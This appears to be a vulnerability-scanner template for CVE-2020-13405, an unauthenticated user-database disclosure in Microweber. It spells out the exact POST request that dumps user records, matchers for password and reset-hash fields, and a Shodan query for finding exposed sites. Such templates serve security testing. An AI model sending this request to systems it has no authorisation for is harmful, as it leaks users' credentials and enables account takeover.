id: CVE-2020-13405

info:
  name: MicroWeber - Unauthenticated User Database Disclosure
  author: ritikchaddha,amit-jd
  severity: high
  description: |
    The PHP code for controller.php runs Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML.
  reference:
    - https://rhinosecuritylabs.com/research/microweber-database-disclosure/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13405
  metadata:
    verified: true
    shodan-query: http.html:"microweber"
  tags: cve,cve2020,microweber,unauth

requests:
  - raw:
      - |
        POST /module/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Referer: {{BaseURL}}admin/view:modules/load_module:users

        module=users/controller

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"username")'
          - 'contains(body,"password")'
          - 'contains(body,"password_reset_hash")'
          - 'status_code==200'
          - 'contains(all_headers,"text/html")'
        condition: and